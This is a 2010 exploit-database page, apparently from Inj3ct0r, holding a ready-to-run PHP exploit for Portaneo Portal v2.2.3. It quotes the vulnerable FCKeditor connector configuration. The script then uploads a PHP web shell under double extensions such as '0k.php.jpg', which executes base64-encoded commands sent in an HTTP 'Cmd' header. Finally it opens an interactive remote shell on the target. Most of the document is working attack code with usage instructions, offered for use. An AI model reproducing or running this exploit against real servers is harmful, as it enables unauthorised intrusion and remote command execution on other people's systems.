Home / os / win7

Portaneo Portal v2.2.3 Remote Arbitary file upload exploit

Posted on 27 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Portaneo Portal v2.2.3 Remote Arbitary file upload exploit </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================================
Portaneo Portal v2.2.3 Remote Arbitary file upload exploit 
==========================================================

&lt;?php
/*

 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /'             __  /'__`        / \__  /'__`                   0
 0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
 1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
 0       / /    /   / \__/  \_  \_   /           1
 1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
 0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
 1                   \____/ &gt;&gt; Exploit database separated by exploit   0
 0                   /___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 Vendor: www.portaneo.com
 Download : http://sourceforge.net/projects/posh/files/
 exploited by ..: eidelweiss
 Affected: Version 2.2.3 (Other or lowers version may also be affected)
 Greetz: all inj3ctor Team, JosS (Hack0wn), exploit-db Team, yogyacarderlink Team, devilzc0de Team
 details..: works with an Apache server with the mod_mime module installed (if specific)
  
 [-] vulnerable code in path/tools/fckeditor/editor/filemanager/connectors/php/config.php
     
    [*] // SECURITY: You must explicitly enable this &quot;connector&quot;. (Set it to &quot;true&quot;).
    [*] 
    [*]	$Config['Enabled'] = true ;
    [*]
    [*] // Path to user files relative to the document root.
    [*] $Config['UserFilesPath'] = '/upload/fckeditor/' ;
    [*]
    [*] // Fill the following value it you prefer to specify the absolute path for the
    [*] // user files directory. Usefull if you are using a virtual directory, symbolic
    [*] // link or alias. Examples: 'C:\MySite\UserFiles\' or '/root/mysite/UserFiles/'.
    [*] // Attention: The above 'UserFilesPath' must point to the same directory.
    [*] 
    [*]
    [*] $Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
    [*] $Config['DeniedExtensions']['File']     = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Image']   = array('bmp','gif','jpeg','jpg','png') ;
    [*] $Config['DeniedExtensions']['Image']    = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Flash']   = array('swf','flv') ;
    [*] $Config['DeniedExtensions']['Flash']    = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Media']   = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
    [*] $Config['DeniedExtensions']['Media']    = array() ;
     
    with a default configuration of this script, an attacker might be able to upload arbitrary
    files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set(&quot;default_socket_timeout&quot;, 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print &quot;
[-] No response from {$host}:80 Trying again...&quot;;
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
function upload()
{
 global $host, $path;
  
 $connector = &quot;/tools/fckeditor/editor/filemanager/connectors/php/config.php&quot;;
 $file_ext  = array(&quot;zip&quot;, &quot;jpg&quot;, &quot;fla&quot;, &quot;doc&quot;, &quot;xls&quot;, &quot;rtf&quot;, &quot;csv&quot;);
  
 foreach ($file_ext as $ext)
 {
  print &quot;
[-] Trying to upload with .{$ext} extension...&quot;;
   
  $data  = &quot;--abcdef
&quot;;
  $data .= &quot;Content-Disposition: form-data; name=&quot;NewFile&quot;; filename=&quot;0k.php.{$ext}&quot;
&quot;;
  $data .= &quot;Content-Type: application/octet-stream

&quot;;
  $data .= &quot;&lt;?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?&gt;
&quot;;
  $data .= &quot;--abcdef--
&quot;;
   
  $packet  = &quot;POST {$path}{$connector}?Command=FileUpload&amp;CurrentFolder={$path} HTTP/1.0
&quot;;
  $packet .= &quot;Host: {$host}
&quot;;
  $packet .= &quot;Content-Length: &quot;.strlen($data).&quot;
&quot;;
  $packet .= &quot;Content-Type: multipart/form-data; boundary=abcdef
&quot;;
  $packet .= &quot;Connection: close

&quot;;
  $packet .= $data;
   
  preg_match(&quot;/OnUploadCompleted((.*),'(.*)')/i&quot;, http_send($host, $packet), $html);
   
  if (!in_array(intval($html[1]), array(0, 201))) die(&quot;
[-] Upload failed! (Error {$html[1]}: {$html[2]})
&quot;);
   
  $packet  = &quot;GET {$path}0k.php.{$ext} HTTP/1.0
&quot;;
  $packet .= &quot;Host: {$host}
&quot;;
  $packet .= &quot;Connection: close

&quot;;
  $html    = http_send($host, $packet);
   
  if (!eregi(&quot;print&quot;, $html) and eregi(&quot;_code_&quot;, $html)) return $ext;
   
  sleep(1);
 }
  
 return false;
}
print &quot;
+---------------------------------------------------------------------------+&quot;;
print &quot;
| Portaneo Portal v2.2.3 Remote Arbitrary File Upload Exploit by eidelweiss |&quot;;
print &quot;
+---------------------------------------------------------------------------+
&quot;;
if ($argc &lt; 3)
{
 print &quot;
Usage......: php $argv[0] host path
&quot;;
 print &quot;
Example....: php $argv[0] localhost /&quot;;
 print &quot;
Example....: php $argv[0] localhost /POSH/
&quot;;
 die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die(&quot;

[-] Exploit failed...
&quot;);
else print &quot;
[-] Shell uploaded...starting it!
&quot;;
define(STDIN, fopen(&quot;php://stdin&quot;, &quot;r&quot;));
while(1)
{
 print &quot;POSH-shell# &quot;;
 $cmd = trim(fgets(STDIN));
 if ($cmd != &quot;exit&quot;)
 {
  $packet = &quot;GET {$path}0k.php.{$ext} HTTP/1.0
&quot;;
  $packet.= &quot;Host: {$host}
&quot;;
  $packet.= &quot;Cmd: &quot;.base64_encode($cmd).&quot;
&quot;;
  $packet.= &quot;Connection: close

&quot;;
  $html   = http_send($host, $packet);
  if (!eregi(&quot;_code_&quot;, $html)) die(&quot;
[-] Exploit failed...
&quot;);
  $shell = explode(&quot;_code_&quot;, $html);
  print &quot;
{$shell[1]}&quot;;
 }
 else break;
}
?&gt;



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :